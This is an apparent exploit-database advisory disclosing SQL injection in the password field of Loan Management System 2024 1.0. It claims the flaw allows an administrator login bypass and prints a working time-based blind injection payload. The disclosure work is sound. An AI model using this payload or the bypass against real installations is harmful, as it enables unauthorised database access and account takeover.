Copyright Loan Management System 2024 1.0 SQL Injection

2024.01.13

Credit: nu11secur1ty

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

## Title: Copyright © Loan Management System 2024-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 01/12/2024
## Vendor: https://twitter.com/razormist
## Software: https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `password` parameter is vulnerable to SQL injection attacks. The
payload ' was submitted in the password parameter, and a database
error message was returned. Also, the attacker can bypass the login
form and log in to the system as an administrator using this
vulnerability SQLi bypass authentication.
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=aeoZNyVE&password=r8D!y8e!I8' AND (SELECT 8282
FROM (SELECT(SLEEP(7)))jrPA)# PgMx&login=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2024/Loan-Management-System-2024-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/01/copyright-loan-management-system-2024.html)
## Time spend:
00:35:00

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Copyright Loan Management System 2024 1.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.